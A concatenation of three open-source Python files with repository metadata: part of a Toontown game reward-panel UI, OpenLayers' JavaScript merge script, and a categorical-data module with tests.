nextExp = self.getNextExpValue(curExp, i)
trackBar['range'] = nextExp
trackBar['value'] = ToontownBattleGlobals.UnpaidMaxSkills[i]
trackBar['text'] = TTLocalizer.InventoryGuestExp
elif curExp >= ToontownBattleGlobals.regMaxSkill:
nextExp = self.getNextExpValueUber(curExp, i)
trackBar['range'] = nextExp
uberCurrExp = curExp - ToontownBattleGlobals.regMaxSkill
trackBar['value'] = uberCurrExp
trackBar['text'] = TTLocalizer.InventoryUberTrackExp % {'nextExp': ToontownBattleGlobals.MaxSkill - curExp}
else:
nextExp = self.getNextExpValue(curExp, i)
trackBar['range'] = nextExp
trackBar['value'] = curExp
trackBar['text'] = '%s/%s' % (curExp, nextExp)
self.resetBarColor(i)
else:
trackBar.hide()
def incrementExp(self, track, newValue, toon):
trackBar = self.trackBars[track]
oldValue = trackBar['value']
newValue = min(ToontownBattleGlobals.MaxSkill, newValue)
nextExp = self.getNextExpValue(newValue, track)
if newValue >= ToontownBattleGlobals.UnpaidMaxSkills[track] and toon.getGameAccess() != OTPGlobals.AccessFull:
newValue = oldValue
trackBar['text'] = TTLocalizer.GuestLostExp
elif newValue >= ToontownBattleGlobals.regMaxSkill:
newValue = newValue - ToontownBattleGlobals.regMaxSkill
nextExp = self.getNextExpValueUber(newValue, track)
trackBar['text'] = TTLocalizer.InventoryUberTrackExp % {'nextExp': ToontownBattleGlobals.UberSkill - newValue}
else:
trackBar['text'] = '%s/%s' % (newValue, nextExp)
trackBar['range'] = nextExp
trackBar['value'] = newValue
trackBar['barColor'] = (ToontownBattleGlobals.TrackColors[track][0],
ToontownBattleGlobals.TrackColors[track][1],
ToontownBattleGlobals.TrackColors[track][2],
1)
def resetBarColor(self, track):
self.trackBars[track]['barColor'] = (ToontownBattleGlobals.TrackColors[track][0] * 0.8,
ToontownBattleGlobals.TrackColors[track][1] * 0.8,
ToontownBattleGlobals.TrackColors[track][2] * 0.8,
1)
def incrementMerits(self, toon, dept, newValue, totalMerits):
meritBar = self.meritBars[dept]
promoStatus = toon.promotionStatus[dept]
if totalMerits:
newValue = min(totalMerits, newValue)
meritBar['range'] = totalMerits
meritBar['value'] = newValue
if promoStatus != ToontownGlobals.PendingPromotion:
meritBar['text'] = '%s/%s %s' % (newValue, totalMerits, TTLocalizer.RewardPanelMeritBarLabels[dept])
def resetMeritBarColor(self, dept):
self.meritBars[dept]['barColor'] = (DisguisePage.DeptColors[dept][0] * 0.8,
DisguisePage.DeptColors[dept][1] * 0.8,
DisguisePage.DeptColors[dept][2] * 0.8,
1)
def getRandomCongratsPair(self, toon):
congratsStrings = TTLocalizer.RewardPanelCongratsStrings
numStrings = len(congratsStrings)
indexList = range(numStrings)
index1 = random.choice(indexList)
indexList.remove(index1)
index2 = random.choice(indexList)
string1 = congratsStrings[index1]
string2 = congratsStrings[index2]
return (string1, string2)
def uberGagInterval(self, toon, track, level):
self.endTrackFrame.hide()
self.gagExpFrame.hide()
self.newGagFrame.show()
self.promotionFrame.hide()
self.questFrame.hide()
self.itemFrame.hide()
self.missedItemFrame.hide()
self.newGagFrame['text'] = TTLocalizer.RewardPanelUberGag % {'gagName': ToontownBattleGlobals.Tracks[track].capitalize(),
'exp': str(ToontownBattleGlobals.UberSkill),
'avName': toon.getName()}
self.congratsLeft['text'] = ''
self.congratsRight['text'] = ''
gagOriginal = base.localAvatar.inventory.buttonLookup(track, level)
self.newGagIcon = gagOriginal.copyTo(self.newGagFrame)
self.newGagIcon.setPos(0, 0, -0.25)
self.newGagIcon.setScale(1.5)
def newGag(self, toon, track, level):
self.endTrackFrame.hide()
self.gagExpFrame.hide()
self.newGagFrame.show()
self.promotionFrame.hide()
self.questFrame.hide()
self.itemFrame.hide()
self.missedItemFrame.hide()
self.newGagFrame['text'] = TTLocalizer.RewardPanelNewGag % {'gagName': ToontownBattleGlobals.Tracks[track].capitalize(),
'avName': toon.getName()}
self.congratsLeft['text'] = ''
self.congratsRight['text'] = ''
gagOriginal = base.localAvatar.inventory.buttonLookup(track, level)
self.newGagIcon = gagOriginal.copyTo(self.newGagFrame)
self.newGagIcon.setPos(0, 0, -0.25)
self.newGagIcon.setScale(1.5)
def cleanupNewGag(self):
self.endTrackFrame.hide()
if self.newGagIcon:
self.newGagIcon.removeNode()
self.newGagIcon = None
self.gagExpFrame.show()
self.newGagFrame.hide()
self.promotionFrame.hide()
self.questFrame.hide()
self.itemFrame.hide()
self.missedItemFrame.hide()
return
def getNewGagIntervalList(self, toon, track, level):
leftCongratsAnticipate = 1.0
rightCongratsAnticipate = 1.0
finalDelay = 1.5
leftString, rightString = self.getRandomCongratsPair(toon)
intervalList = [Func(self.newGag, toon, track, level),
Wait(leftCongratsAnticipate),
Func(self.congratsLeft.setProp, 'text', leftString),
Wait(rightCongratsAnticipate),
Func(self.congratsRight.setProp, 'text', rightString),
Wait(finalDelay),
Func(self.cleanupNewGag)]
return intervalList
def getUberGagIntervalList(self, toon, track, level):
leftCongratsAnticipate = 1.0
rightCongratsAnticipate = 1.0
finalDelay = 1.5
leftString, rightString = self.getRandomCongratsPair(toon)
intervalList = [Func(self.uberGagInterval, toon, track, level),
Wait(leftCongratsAnticipate),
Func(self.congratsLeft.setProp, 'text', leftString),
Wait(rightCongratsAnticipate),
Func(self.congratsRight.setProp, 'text', rightString),
Wait(finalDelay),
Func(self.cleanupNewGag)]
return intervalList
def vanishFrames(self):
self.hide()
self.endTrackFrame.hide()
self.gagExpFrame.hide()
self.newGagFrame.hide()
self.promotionFrame.hide()
self.questFrame.hide()
self.itemFrame.hide()
self.missedItemFrame.hide()
self.cogPartFrame.hide()
self.missedItemFrame.hide()
def endTrack(self, toon, toonList, track):
for t in toonList:
if t == base.localAvatar:
self.show()
self.endTrackFrame.show()
self.endTrackFrame['text'] = TTLocalizer.RewardPanelEndTrack % {'gagName': ToontownBattleGlobals.Tracks[track].capitalize(),
'avName': toon.getName()}
gagLast = base.localAvatar.inventory.buttonLookup(track, ToontownBattleGlobals.UBER_GAG_LEVEL_INDEX)
self.gagIcon = gagLast.copyTo(self.endTrackFrame)
self.gagIcon.setPos(0, 0, -0.25)
self.gagIcon.setScale(1.5)
def cleanIcon(self):
self.gagIcon.removeNode()
self.gagIcon = None
return
def cleanupEndTrack(self):
self.endTrackFrame.hide()
self.gagExpFrame.show()
self.newGagFrame.hide()
self.promotionFrame.hide()
self.questFrame.hide()
self.itemFrame.hide()
self.missedItemFrame.hide()
def getEndTrackIntervalList(self, toon, toonList, track):
intervalList = [Func(self.endTrack, toon, toonList, track), Wait(2.0), Func(self.cleanIcon)]
return intervalList
def showTrackIncLabel(self, track, earnedSkill, guestWaste = 0):
if guestWaste:
self.trackIncLabels[track]['text'] = ''
elif earnedSkill > 0:
self.trackIncLabels[track]['text'] = '+ ' + str(earnedSkill)
elif earnedSkill < 0:
self.trackIncLabels[track]['text'] = ' ' + str(earnedSkill)
self.trackIncLabels[track].show()
def showMeritIncLabel(self, dept, earnedMerits):
self.meritIncLabels[dept]['text'] = '+ ' + str(earnedMerits)
self.meritIncLabels[dept].show()
def getTrackIntervalList(self, toon, track, origSkill, earnedSkill, hasUber, guestWaste = 0):
if hasUber < 0:
print (toon.doId, 'Reward Panel received an invalid hasUber from an uberList')
tickDelay = 1.0 / 60
intervalList = []
if origSkill + earnedSkill >= ToontownBattleGlobals.UnpaidMaxSkills[track] and toon.getGameAccess() != OTPGlobals.AccessFull:
lostExp = origSkill + earnedSkill - ToontownBattleGlobals.UnpaidMaxSkills[track]
intervalList.append(Func(self.showTrackIncLabel, track, lostExp, 1))
else:
intervalList.append(Func(self.showTrackIncLabel, track, earnedSkill))
barTime = 0.5
numTicks = int(math.ceil(barTime / tickDelay))
for i in xrange(numTicks):
t = (i + 1) / float(numTicks)
newValue = int(origSkill + t * earnedSkill + 0.5)
intervalList.append(Func(self.incrementExp, track, newValue, toon))
intervalList.append(Wait(tickDelay))
intervalList.append(Func(self.resetBarColor, track))
intervalList.append(Wait(0.1))
nextExpValue = self.getNextExpValue(origSkill, track)
finalGagFlag = 0
while origSkill + earnedSkill >= nextExpValue and origSkill < nextExpValue and not finalGagFlag:
if newValue >= ToontownBattleGlobals.UnpaidMaxSkills[track] and toon.getGameAccess() != OTPGlobals.AccessFull:
pass
elif nextExpValue != ToontownBattleGlobals.MaxSkill:
intervalList += self.getNewGagIntervalList(toon, track, ToontownBattleGlobals.Levels[track].index(nextExpValue))
newNextExpValue = self.getNextExpValue(nextExpValue, track)
if newNextExpValue == nextExpValue:
finalGagFlag = 1
else:
nextExpValue = newNextExpValue
uberIndex = ToontownBattleGlobals.LAST_REGULAR_GAG_LEVEL + 1
currentSkill = origSkill + earnedSkill
uberSkill = ToontownBattleGlobals.UberSkill + ToontownBattleGlobals.Levels[track][ToontownBattleGlobals.LAST_REGULAR_GAG_LEVEL + 1]
if currentSkill >= uberSkill and not hasUber > 0:
intervalList += self.getUberGagIntervalList(toon, track, ToontownBattleGlobals.LAST_REGULAR_GAG_LEVEL + 1)
intervalList.append(Wait(0.1))
skillDiff = currentSkill - ToontownBattleGlobals.Levels[track][ToontownBattleGlobals.LAST_REGULAR_GAG_LEVEL + 1]
barTime = math.log(skillDiff + 1)
numTicks = int(math.ceil(barTime / tickDelay))
displayedSkillDiff = skillDiff
if displayedSkillDiff > ToontownBattleGlobals.UberSkill:
displayedSkillDiff = ToontownBattleGlobals.UberSkill
intervalList.append(Func(self.showTrackIncLabel, track, -displayedSkillDiff))
for i in xrange(numTicks):
t = (i + 1) / float(numTicks)
newValue = int(currentSkill - t * skillDiff + 0.5)
intervalList.append(Func(self.incrementExp, track, newValue, toon))
intervalList.append(Wait(tickDelay * 0.5))
intervalList.append(Wait(0.1))
return intervalList
def getMeritIntervalList(self, toon, dept, origMerits, earnedMerits):
tickDelay = 1.0 / 60
intervalList = []
totalMerits = CogDisguiseGlobals.getTotalMerits(toon, dept)
neededMerits = 0
if totalMerits and origMerits != totalMerits:
neededMerits = totalMerits - origMerits
intervalList.append(Func(self.showMeritIncLabel, dept, min(neededMerits, earnedMerits)))
barTime = 0.5
numTicks = int(math.ceil(barTime / tickDelay))
for i in xrange(numTicks):
t = (i + 1) / float(numTicks)
newValue = int(origMerits + t * earnedMerits + 0.5)
intervalList.append(Func(self.incrementMerits, toon, dept, newValue, totalMerits))
intervalList.append(Wait(tickDelay))
intervalList.append(Func(self.resetMeritBarColor, dept))
intervalList.append(Wait(0.1))
if toon.cogLevels[dept] < ToontownGlobals.MaxCogSuitLevel:
if neededMerits and toon.readyForPromotion(dept):
intervalList.append(Wait(0.4))
intervalList += self.getPromotionIntervalList(toon, dept)
return intervalList
def promotion(self, toon, dept):
self.endTrackFrame.hide()
self.gagExpFrame.hide()
self.newGagFrame.hide()
self.promotionFrame.show()
self.questFrame.hide()
self.itemFrame.hide()
self.missedItemFrame.hide()
name = SuitDNA.suitDepts[dept]
self.promotionFrame['text'] = TTLocalizer.RewardPanelPromotion % SuitDNA.suitDeptFullnames[name]
icons = loader.loadModel('phase_3/models/gui/cog_icons')
if dept == 0:
self.deptIcon = icons.find('**/CorpIcon').copyTo(self.promotionFrame)
elif dept == 1:
self.deptIcon = icons.find('**/LegalIcon').copyTo(self.promotionFrame)
elif dept == 2:
self.deptIcon = icons.find('**/MoneyIcon').copyTo(self.promotionFrame)
elif dept == 3:
self.deptIcon = icons.find('**/SalesIcon').copyTo(self.promotionFrame)
icons.removeNode()
self.deptIcon.setPos(0, 0, -0.225)
self.deptIcon.setScale(0.33)
def cleanupPromotion(self):
if not hasattr(self, 'deptIcon'):
return
self.deptIcon.removeNode()
self.deptIcon = None
self.endTrackFrame.hide()
self.gagExpFrame.show()
self.newGagFrame.hide()
self.promotionFrame.hide()
self.questFrame.hide()
self.itemFrame.hide()
self.missedItemFrame.hide()
return
def getPromotionIntervalList(self, toon, dept):
finalDelay = 2.0
intervalList = [Func(self.promotion, toon, dept), Wait(finalDelay), Func(self.cleanupPromotion)]
return intervalList
def getQuestIntervalList(self, toon, deathList, toonList, origQuestsList, itemList, helpfulToonsList = []):
avId = toon.getDoId()
tickDelay = 0.2
intervalList = []
toonShortList = []
for t in toonList:
if t is not None:
toonShortList.append(t)
cogList = []
for i in xrange(0, len(deathList), 4):
cogIndex = deathList[i]
cogLevel = deathList[i + 1]
activeToonBits = deathList[i + 2]
flags = deathList[i + 3]
activeToonIds = []
for j in xrange(8):
if activeToonBits & 1 << j:
if toonList[j] is not None:
activeToonIds.append(toonList[j].getDoId())
isSkelecog = flags & ToontownBattleGlobals.DLF_SKELECOG
isForeman = flags & ToontownBattleGlobals.DLF_FOREMAN
isVP = flags & ToontownBattleGlobals.DLF_VP
isCFO = flags & ToontownBattleGlobals.DLF_CFO
isSupervisor = flags & ToontownBattleGlobals.DLF_SUPERVISOR
isVirtual = flags & ToontownBattleGlobals.DLF_VIRTUAL
hasRevives = flags & ToontownBattleGlobals.DLF_REVIVES
if isVP or isCFO:
cogType = None
cogTrack = SuitDNA.suitDepts[cogIndex]
else:
cogType = SuitDNA.suitHeadTypes[cogIndex]
cogTrack = SuitDNA.getSuitDept(cogType)
cogList.append({'type': cogType,
'level': cogLevel,
'track': cogTrack,
'isSkelecog': isSkelecog,
'isForeman': isForeman,
'isVP': isVP,
'isCFO': isCFO,
'isSupervisor': isSupervisor,
'isVirtual': isVirtual,
'hasRevives': hasRevives,
'activeToons': activeToonIds})
try:
zoneId = base.cr.playGame.getPlace().getTaskZoneId()
except:
zoneId = 0
avQuests = []
for i in xrange(0, len(origQuestsList), 5):
avQuests.append(origQuestsList[i:i + 5])
for i in xrange(len(avQuests)):
questDesc = avQuests[i]
questId, npcId, toNpcId, rewardId, toonProgress = questDesc
quest = Quests.getQuest(questId)
if quest and i < len(self.questLabelList):
questString = quest.getString()
progressString = quest.getProgressString(toon, questDesc)
questLabel = self.questLabelList[i]
earned = 0
orig = questDesc[4] & pow(2, 16) - 1
num = 0
if quest.getType() == Quests.RecoverItemQuest:
questItem = quest.getItem()
if questItem in itemList:
earned = itemList.count(questItem)
else:
for cogDict in cogList:
if cogDict['isVP']:
num = quest.doesVPCount(avId, cogDict, zoneId, toonShortList)
elif cogDict['isCFO']:
num = quest.doesCFOCount(avId, cogDict, zoneId, toonShortList)
else:
num = quest.doesCogCount(avId, cogDict, zoneId, toonShortList)
if num:
if base.config.GetBool('battle-passing-no-credit', True):
if avId in helpfulToonsList:
earned += num
else:
self.notify.debug('avId=%d not getting %d kill cog quest credit' % (avId, num))
else:
earned += num
if base.localAvatar.tutorialAck:
if earned > 0:
earned = min(earned, quest.getNumQuestItems() - questDesc[4])
if earned > 0 or base.localAvatar.tutorialAck == 0 and num == 1:
barTime = 0.5
numTicks = int(math.ceil(barTime / tickDelay))
for i in xrange(numTicks):
t = (i + 1) / float(numTicks)
newValue = int(orig + t * earned + 0.5)
questDesc[4] = newValue
progressString = quest.getProgressString(toon, questDesc)
str = '%s : %s' % (questString, progressString)
if quest.getCompletionStatus(toon, questDesc) == Quests.COMPLETE:
intervalList.append(Func(questLabel.setProp, 'text_fg', (0, 0.3, 0, 1)))
intervalList.append(Func(questLabel.setProp, 'text', str))
intervalList.append(Wait(tickDelay))
return intervalList
def getItemIntervalList(self, toon, itemList):
intervalList = []
for itemId in itemList:
itemName = Quests.getItemName(itemId)
intervalList.append(Func(self.itemLabel.setProp, 'text', itemName))
intervalList.append(Wait(1))
return intervalList
def getCogPartIntervalList(self, toon, cogPartList):
itemName = CogDisguiseGlobals.getPartName(cogPartList)
intervalList = []
intervalList.append(Func(self.cogPartLabel.setProp, 'text', itemName))
intervalList.append(Wait(1))
return intervalList
def getMissedItemIntervalList(self, toon, missedItemList):
intervalList = []
for itemId in missedItemList:
itemName = Quests.getItemName(itemId)
intervalList.append(Func(self.missedItemLabel.setProp, 'text', itemName))
intervalList.append(Wait(1))
return intervalList
def getExpTrack(self, toon, origExp, earnedExp, deathList, origQuestsList, itemList, missedItemList, origMeritList, meritList, partList, toonList, uberEntry, helpfulToonsList, noSkip = False):
track = Sequence(Func(self.initGagFrame, toon, origExp, origMeritList, noSkip=noSkip), Wait(1.0))
endTracks = [0,
0,
0,
0,
0,
0,
0]
trackEnded = 0
for trackIndex in xrange(len(earnedExp)):
if earnedExp[trackIndex] > 0 or origExp[trackIndex] >= ToontownBattleGlobals.MaxSkill:
track += self.getTrackIntervalList(toon, trackIndex, origExp[trackIndex], earnedExp[trackIndex], ToontownBattleGlobals.getUberFlagSafe(uberEntry, trackIndex))
maxExp = ToontownBattleGlobals.MaxSkill - ToontownBattleGlobals.UberSkill
if origExp[trackIndex] < maxExp and earnedExp[trackIndex] + origExp[trackIndex] >= maxExp:
endTracks[trackIndex] = 1
trackEnded = 1
for dept in xrange(len(SuitDNA.suitDepts)):
if meritList[dept]:
track += self.getMeritIntervalList(toon, dept, origMeritList[dept], meritList[dept])
track.append(Wait(0.75))
itemInterval = self.getItemIntervalList(toon, itemList)
if itemInterval:
track.append(Func(self.initItemFrame, toon))
track.append(Wait(0.25))
track += itemInterval
track.append(Wait(0.5))
missedItemInterval = self.getMissedItemIntervalList(toon, missedItemList)
if missedItemInterval:
track.append(Func(self.initMissedItemFrame, toon))
track.append(Wait(0.25))
track += missedItemInterval
track.append(Wait(0.5))
self.notify.debug('partList = %s' % partList)
newPart = 0
for part in partList:
if part != 0:
newPart = 1
break
if newPart:
partList = self.getCogPartIntervalList(toon, partList)
if partList:
track.append(Func(self.initCogPartFrame, toon))
track.append(Wait(0.25))
track += partList
track.append(Wait(0.5))
questList = self.getQuestIntervalList(toon, deathList, toonList, origQuestsList, itemList, helpfulToonsList)
if questList:
avQuests = []
for i in xrange(0, len(origQuestsList), 5):
avQuests.append(origQuestsList[i:i + 5])
track.append(Func(self.initQuestFrame, toon, copy.deepcopy(avQuests)))
track.append(Wait(0.25))
track += questList
track.append(Wait(0.5))
track.append(Wait(0.25))
if trackEnded:
track.append(Func(self.vanishFrames))
track.append(Fanfare.makeFanfare(0, toon)[0])
for i in xrange(len(endTracks)):
if endTracks[i] is 1:
track += self.getEndTrackIntervalList(toon, toonList, i)
track.append(Func(self.cleanupEndTrack))
return track
def testMovie(self, otherToons = []):
track = Sequence()
track.append(Func(self.show))
expTrack = self.getExpTrack(base.localAvatar, [1999,
0,
20,
30,
10,
0,
60], [2,
0,
2,
6,
1,
0,
8], [3,
1,
3,
0,
2,
2,
1,
1,
30,
2,
1,
0], [], [], [], [0,
0,
0,
0], [0,
0,
0,
0], [], [base.localAvatar] + otherToons)
track.append(expTrack)
if len(track) > 0:
track.append(Func(self.hide))
track.append(Func(base.localAvatar.loop, 'neutral'))
track.append(Func(base.localAvatar.startUpdateSmartCamera))
track.start()
base.localAvatar.loop('victory')
base.localAvatar.stopUpdateSmartCamera()
base.camera.setPosHpr(0, 8, base.localAvatar.getHeight() * 0.66, 179, 15, 0)
else:
self.notify.debug('no experience, no movie.')
return None
def _handleSkip(self):
messenger.send(self.SkipBattleMovieEvent)
| {
"content_hash": "3457b296c68771f66f932f4233307504",
"timestamp": "",
"source": "github",
"line_count": 813,
"max_line_length": 245,
"avg_line_length": 46.141451414514144,
"alnum_prop": 0.6060032522059019,
"repo_name": "linktlh/Toontown-journey",
"id": "28c4d6f892990369986a07d8df7010833b0153e2",
"size": "37513",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "toontown/battle/RewardPanel.py",
"mode": "33261",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
} |
#!/usr/bin/env python
#
# Merge multiple JavaScript source code files into one.
#
# Usage:
# This script requires source files to have dependencies specified in them.
#
# Dependencies are specified with a comment of the form:
#
# // @requires <file path>
#
# e.g.
#
# // @requires Geo/DataSource.js
#
# This script should be executed like so:
#
# mergejs.py <output.js> <directory> [...]
#
# e.g.
#
# mergejs.py openlayers.js Geo/ CrossBrowser/
#
# This example will cause the script to walk the `Geo` and
# `CrossBrowser` directories--and subdirectories thereof--and import
# all `*.js` files encountered. The dependency declarations will be extracted
# and then the source code from imported files will be output to
# a file named `openlayers.js` in an order which fulfils the dependencies
# specified.
#
#
# Note: This is a very rough initial version of this code.
#
# -- Copyright 2005-2010 OpenLayers contributors / OpenLayers project --
#
# TODO: Allow files to be excluded. e.g. `Crossbrowser/DebugMode.js`?
# TODO: Report error when dependency can not be found rather than KeyError.
import re
import os
import sys
SUFFIX_JAVASCRIPT = ".js"
RE_REQUIRE = "@requires:? (.*)\n" # TODO: Ensure in comment?
class SourceFile:
"""
Represents a Javascript source code file.
"""
def __init__(self, filepath, source):
"""
"""
self.filepath = filepath
self.source = source
self.requiredBy = []
def _getRequirements(self):
"""
Extracts the dependencies specified in the source code and returns
a list of them.
"""
# TODO: Cache?
return re.findall(RE_REQUIRE, self.source)
requires = property(fget=_getRequirements, doc="")
def usage(filename):
"""
Displays a usage message.
"""
print "%s [-c <config file>] <output.js> <directory> [...]" % filename
class Config:
"""
Represents a parsed configuration file.
A configuration file should be of the following form:
[first]
3rd/prototype.js
core/application.js
core/params.js
# A comment
[last]
core/api.js # Another comment
[exclude]
3rd/logger.js
All headings are required.
The files listed in the `first` section will be forced to load
*before* all other files (in the order listed). The files in `last`
section will be forced to load *after* all the other files (in the
order listed).
The files list in the `exclude` section will not be imported.
Any text appearing after a # symbol indicates a comment.
"""
def __init__(self, filename):
"""
Parses the content of the named file and stores the values.
"""
lines = [re.sub("#.*?$", "", line).strip() # Assumes end-of-line character is present
for line in open(filename)
if line.strip() and not line.strip().startswith("#")] # Skip blank lines and comments
self.forceFirst = lines[lines.index("[first]") + 1:lines.index("[last]")]
self.forceLast = lines[lines.index("[last]") + 1:lines.index("[include]")]
self.include = lines[lines.index("[include]") + 1:lines.index("[exclude]")]
self.exclude = lines[lines.index("[exclude]") + 1:]
def run (sourceDirectory, outputFilename = None, configFile = None):
cfg = None
if configFile:
cfg = Config(configFile)
allFiles = []
## Find all the Javascript source files
for root, dirs, files in os.walk(sourceDirectory):
for filename in files:
if filename.endswith(SUFFIX_JAVASCRIPT) and not filename.startswith("."):
filepath = os.path.join(root, filename)[len(sourceDirectory)+1:]
filepath = filepath.replace("\\", "/")
if cfg and cfg.include:
if filepath in cfg.include or filepath in cfg.forceFirst:
allFiles.append(filepath)
elif (not cfg) or (filepath not in cfg.exclude):
allFiles.append(filepath)
## Header inserted at the start of each file in the output
HEADER = "/* " + "=" * 70 + "\n %s\n" + " " + "=" * 70 + " */\n\n"
files = {}
order = [] # List of filepaths to output, in a dependency satisfying order
## Import file source code
## TODO: Do import when we walk the directories above?
for filepath in allFiles:
print "Importing: %s" % filepath
fullpath = os.path.join(sourceDirectory, filepath).strip()
content = open(fullpath, "U").read() # TODO: Ensure end of line @ EOF?
files[filepath] = SourceFile(filepath, content) # TODO: Chop path?
print
from toposort import toposort
complete = False
resolution_pass = 1
while not complete:
order = [] # List of filepaths to output, in a dependency satisfying order
nodes = []
routes = []
## Resolve the dependencies
print "Resolution pass %s... " % resolution_pass
resolution_pass += 1
for filepath, info in files.items():
nodes.append(filepath)
for neededFilePath in info.requires:
routes.append((neededFilePath, filepath))
for dependencyLevel in toposort(nodes, routes):
for filepath in dependencyLevel:
order.append(filepath)
if not files.has_key(filepath):
print "Importing: %s" % filepath
fullpath = os.path.join(sourceDirectory, filepath).strip()
content = open(fullpath, "U").read() # TODO: Ensure end of line @ EOF?
files[filepath] = SourceFile(filepath, content) # TODO: Chop path?
# Double check all dependencies have been met
complete = True
try:
for fp in order:
if max([order.index(rfp) for rfp in files[fp].requires] +
[order.index(fp)]) != order.index(fp):
complete = False
except:
complete = False
print
## Move forced first and last files to the required position
if cfg:
print "Re-ordering files..."
order = cfg.forceFirst + [item
for item in order
if ((item not in cfg.forceFirst) and
(item not in cfg.forceLast))] + cfg.forceLast
print
## Output the files in the determined order
result = []
for fp in order:
f = files[fp]
print "Exporting: ", f.filepath
result.append(HEADER % f.filepath)
source = f.source
result.append(source)
if not source.endswith("\n"):
result.append("\n")
print "\nTotal files merged: %d " % len(files)
if outputFilename:
print "\nGenerating: %s" % (outputFilename)
open(outputFilename, "w").write("".join(result))
return "".join(result)
if __name__ == "__main__":
import getopt
options, args = getopt.getopt(sys.argv[1:], "-c:")
try:
outputFilename = args[0]
except IndexError:
usage(sys.argv[0])
raise SystemExit
else:
sourceDirectory = args[1]
if not sourceDirectory:
usage(sys.argv[0])
raise SystemExit
configFile = None
if options and options[0][0] == "-c":
configFile = options[0][1]
print "Parsing configuration file: %s" % filename
run( sourceDirectory, outputFilename, configFile )
| {
"content_hash": "8cf01453b89b8b75fc987219cb569f8f",
"timestamp": "",
"source": "github",
"line_count": 252,
"max_line_length": 102,
"avg_line_length": 30.166666666666668,
"alnum_prop": 0.59221257563799,
"repo_name": "spatindsaongo/geos",
"id": "865081e1acc6b9643572a7475beb2a56505b7773",
"size": "7602",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "web/js/openlayers/tools/mergejs.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "7006"
},
{
"name": "JavaScript",
"bytes": "3078580"
},
{
"name": "PHP",
"bytes": "293650"
},
{
"name": "Perl",
"bytes": "9860"
},
{
"name": "Python",
"bytes": "180363"
},
{
"name": "Shell",
"bytes": "2567"
}
],
"symlink_target": ""
} |
__all__ = ["Categorical", "code"]
import numpy as np
from charlton import CharltonError
# A simple wrapper around some categorical data. Provides basically no
# services, but it holds data fine... eventually it'd be nice to make a custom
# dtype for this, but doing that right will require fixes to numpy itself.
class Categorical(object):
def __init__(self, int_array, levels, ordered=False, contrast=None):
self.int_array = np.asarray(int_array, dtype=int).ravel()
self.levels = tuple(levels)
self.ordered = ordered
self.contrast = contrast
@classmethod
def from_strings(cls, sequence, levels=None, **kwargs):
if levels is None:
try:
levels = list(set(sequence))
except TypeError:
raise CharltonError("Error converting data to categorical: "
"all items must be hashable")
levels.sort()
level_to_int = {}
for i, level in enumerate(levels):
try:
level_to_int[level] = i
except TypeError:
raise CharltonError("Error converting data to categorical: "
"all levels must be hashable (and %r isn't)"
% (level,))
int_array = np.empty(len(sequence), dtype=int)
for i, entry in enumerate(sequence):
try:
int_array[i] = level_to_int[entry]
except ValueError:
raise CharltonError("Error converting data to categorical: "
"object '%r' does not match any of the "
"expected levels" % (entry,))
return cls(int_array, levels, **kwargs)
def test_categorical():
c = Categorical([0, 1, 2], levels=["a", "b", "c"])
assert isinstance(c.int_array, np.ndarray)
assert np.all(c.int_array == [0, 1, 2])
assert isinstance(c.levels, tuple)
assert c.levels == ("a", "b", "c")
assert not c.ordered
assert c.contrast is None
c2 = Categorical.from_strings(["b", "a", "c"])
assert c2.levels == ("a", "b", "c")
assert np.all(c2.int_array == [1, 0, 2])
assert not c2.ordered
c3 = Categorical.from_strings(["b", "a", "c"],
levels=["a", "c", "d", "b"],
ordered=True)
assert c3.levels == ("a", "c", "d", "b")
print c3.int_array
assert np.all(c3.int_array == [3, 0, 1])
assert c3.ordered
assert c3.contrast is None
c4 = Categorical.from_strings(["a"] * 100, levels=["b", "a"])
assert c4.levels == ("b", "a")
assert np.all(c4.int_array == 1)
assert not c4.ordered
assert c4.contrast is None
c5 = Categorical([[0.0], [1.0], [2.0]], levels=["a", "b", "c"])
assert np.all(c5.int_array == [0, 1, 2])
assert c5.int_array.dtype == np.dtype(int)
class CategoricalTransform(object):
def __init__(self):
self._levels = set()
self._levels_tuple = None
def memorize_chunk(self, data, levels=None, **kwargs):
if levels is None and not isinstance(data, Categorical):
for item in np.asarray(data).ravel():
self._levels.add(item)
def memorize_finish(self):
self._levels_tuple = tuple(sorted(self._levels))
def transform(self, data, levels=None, **kwargs):
if isinstance(data, Categorical):
if levels is not None and data.levels != levels:
raise CharltonError("changing levels of categorical data "
"not supported yet")
return Categorical(data.int_array, data.levels, **kwargs)
if levels is None:
levels = self._levels_tuple
return Categorical.from_strings(data, levels=levels, **kwargs)
# This is for the use of the ModelSpec building code, which has a special
# case where it uses this transform to convert string arrays (and similar)
# into Categoricals, and after memorizing the data it needs to know what
# the levels were.
def levels(self):
assert self._levels_tuple is not None
return self._levels_tuple
def test_CategoricalTransform():
t1 = CategoricalTransform()
t1.memorize_chunk(["a", "b"])
t1.memorize_chunk(["a", "c"])
t1.memorize_finish()
c1 = t1.transform(["a", "c"])
assert c1.levels == ("a", "b", "c")
assert np.all(c1.int_array == [0, 2])
t2 = CategoricalTransform()
t2.memorize_chunk(["a", "b"], contrast="foo", levels=["c", "b", "a"])
t2.memorize_chunk(["a", "c"], contrast="foo", levels=["c", "b", "a"])
t2.memorize_finish()
c2 = t2.transform(["a", "c"], contrast="foo", levels=["c", "b", "a"])
assert c2.levels == ("c", "b", "a")
assert np.all(c2.int_array == [2, 0])
assert c2.contrast == "foo"
# Check that it passes through already-categorical data correctly,
# changing the attributes on a copy only:
c = Categorical.from_strings(["a", "b"], levels=["b", "a"],
ordered=False, contrast="foo")
t3 = CategoricalTransform()
t3.memorize_chunk(c, ordered=True, contrast="bar")
t3.memorize_finish()
c_t = t3.transform(c, ordered=True, contrast="bar")
assert np.all(c_t.int_array == c.int_array)
assert c_t.levels == c.levels
assert not c.ordered
assert c_t.ordered
assert c.contrast == "foo"
assert c_t.contrast == "bar"
# This is just an alias for the above, but with rearranged arguments
class ContrastTransform(CategoricalTransform):
def memorize_chunk(self, data, new_contrast):
CategoricalTransform.memorize_chunk(self, data, contrast=new_contrast)
def transform(self, data, new_contrast):
return CategoricalTransform.transform(self, data, contrast=new_contrast)
def test_ContrastTransform():
t1 = ContrastTransform()
t1.memorize_chunk(["a", "b"], "foo")
t1.memorize_chunk(["a", "c"], "foo")
t1.memorize_finish()
c1 = t1.transform(["a", "c"], "foo")
assert c1.levels == ("a", "b", "c")
